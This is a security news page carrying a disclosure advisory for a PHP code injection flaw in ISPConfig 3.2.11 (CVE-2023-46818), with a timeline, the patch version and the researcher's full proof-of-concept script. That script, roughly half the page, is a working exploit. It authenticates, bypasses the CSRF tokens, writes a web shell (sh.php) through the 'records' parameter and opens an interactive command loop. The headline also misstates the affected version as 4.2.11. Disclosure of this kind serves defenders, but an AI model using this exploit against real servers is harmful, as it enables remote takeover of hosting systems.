Security
Headlines
HeadlinesLatestCVEs

Headline

ISPConfig 3.2.11 PHP Code Injection

ISPConfig versions 4.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.

Packet Storm
#csrf#vulnerability#web#php#perl#auth#ssl

ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability

[-] Software Link:

https://www.ispconfig.org

[-] Affected Versions:

Version 3.2.11 and prior versions.

[-] Vulnerabilities Description:

User input passed through the “records” POST parameter to
/admin/language_edit.php is not properly sanitized before being used
to dynamically generate PHP code that will be executed by the
application. This can be exploited by malicious administrator users to
inject and execute arbitrary PHP code on the web server.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php
(Packet Storm Editor Note: See bottom of this file for PoC)

[-] Solution:

Upgrade to version 3.2.11p1 or later.

[-] Disclosure Timeline:

[25/10/2023] - Vendor notified
[26/10/2023] - Version 3.2.11p1 released
[27/10/2023] - CVE identifier assigned
[07/12/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-46818 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13

[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/

— CVE-2023-46818.php PoC —

<?php

/*
------------------------------------------------------------------------
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
------------------------------------------------------------------------

author..............: Egidio Romano aka EgiX  
mail................: n0b0d13s[at]gmail[dot]com  
software link.......: https://www.ispconfig.org

+-------------------------------------------------------------------------+  
| This proof of concept code was written for educational purpose only.    |  
| Use it at your own risk. Author will be not responsible for any damage. |  
+-------------------------------------------------------------------------+

[-] Vulnerability Description:

User input passed through the "records" POST parameter to /admin/language_edit.php is  
not properly sanitized before being used to dynamically generate PHP code that will be  
executed by the application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13  

*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded(“curl”)) die("[-] cURL extension required!\n");

if ($argc != 4) die(“\nUsage: php $argv[0] <URL> <Username> <Password>\n\n”);

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username ‘{$user}’ and password '{$pass}’\n";

@unlink(‘./cookies.txt’);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, “{$url}login/”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘./cookies.txt’);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘./cookies.txt’);
curl_setopt($ch, CURLOPT_POSTFIELDS, “username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login”);

if (preg_match('/Username or Password wrong/i’, curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode(“<?php print(‘____’); passthru(base64_decode($_SERVER[‘HTTP_C’])); print(‘____’); ?>”);
$injection = "’];file_put_contents('sh.php’,base64_decode(‘{$__phpcode}’));die;#";
$lang_file = str_shuffle(“qwertyuioplkjhgfdsazxcvbnm”).".lng";

curl_setopt($ch, CURLOPT_URL, “{$url}admin/language_edit.php”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “lang=en&module=help&lang_file={$lang_file}”);

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)“/i’, $res, $csrf_id)) die("[-] CSRF ID not found!\n”);
if (!preg_match('/_csrf_key" value="([^"]+)“/i’, $res, $csrf_key)) die("[-] CSRF key not found!\n”);

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, “{$url}admin/sh.php”);
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
print "\nispconfig-shell# ";
if (($cmd = trim(fgets(STDIN))) == “exit”) break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);
preg_match('/____(.*)____/s’, curl_exec($ch), $m) ? print $m[1] : die(“\n[-] Exploit failed!\n”);
}

Related news

CVE-2023-46818: ISPConfig 3.2.11p1 Released - ISPConfig

An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution